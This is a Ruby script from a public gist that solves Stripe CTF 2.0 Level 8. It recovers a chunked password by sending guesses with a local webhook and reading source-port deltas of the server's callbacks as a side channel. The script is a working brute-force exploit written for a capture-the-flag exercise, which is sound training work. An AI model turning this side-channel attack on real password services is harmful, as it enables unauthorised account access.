@bithive
Created August 12, 2014 18:50
Stripe CTF 2.0 Level 8
require 'json'
require 'net/http'
require 'socket'
require 'uri'

# first argument is the url for the passworddb server
uri = URI.parse ARGV.shift
$passdb = Net::HTTP.new uri.host, uri.port

# second argument is the local port for our webhook
$port = ARGV.shift
$server = TCPServer.new $port

# a global variable representing the password in 4 chunks
$chunks = [0,0,0,0]

# makes an http request to the passworddb server
# returns true if the password is correct
def guess password
  puts password
  response = $passdb.post '/', {
    password: password,
    webhooks: [ "localhost:#{$port}" ]
  }.to_json
  response.body =~ /true/
end

# blocks and returns the next source port seen by the web hook
def notice_source_port
  client = $server.accept
  source_port = client.peeraddr[1]
  client.close
  source_port
end

# returns a string representation of the password
def stringify_password
  $chunks.inject('') do |string, chunk|
    string + chunk.to_s.rjust(3, '0')
  end
end

# calibration step 1; need to establish baseline source port
guess stringify_password
first_port = notice_source_port

# calibration step 2; need to establish baseline delta
guess stringify_password
last_port = notice_source_port
last_delta = last_port - first_port

this_chunk = 0
verify = 3 # number of times to verify hits to prevent false positives
checks = verify

loop do
  password = stringify_password

  # make attempt
  if guess password
    puts "Yay! Password is #{password}"
    break
  end

  # observe source port of webhook; calculate delta
  source_port = notice_source_port
  this_delta = source_port - last_port
  last_port = source_port

  if this_delta > last_delta
    # delta grew by exactly one: count it as a hit and repeat the same guess
    # until it has been seen `verify` times, then move on to the next chunk
    if this_delta - last_delta == 1
      checks -= 1
      redo if checks > 0
      checks = verify
      last_delta = this_delta
      this_chunk += 1
    end
    # any larger increase changes nothing, so the same guess is retried
  else
    # no increase over the baseline delta: try the next value for this chunk
    $chunks[this_chunk] += 1
  end
end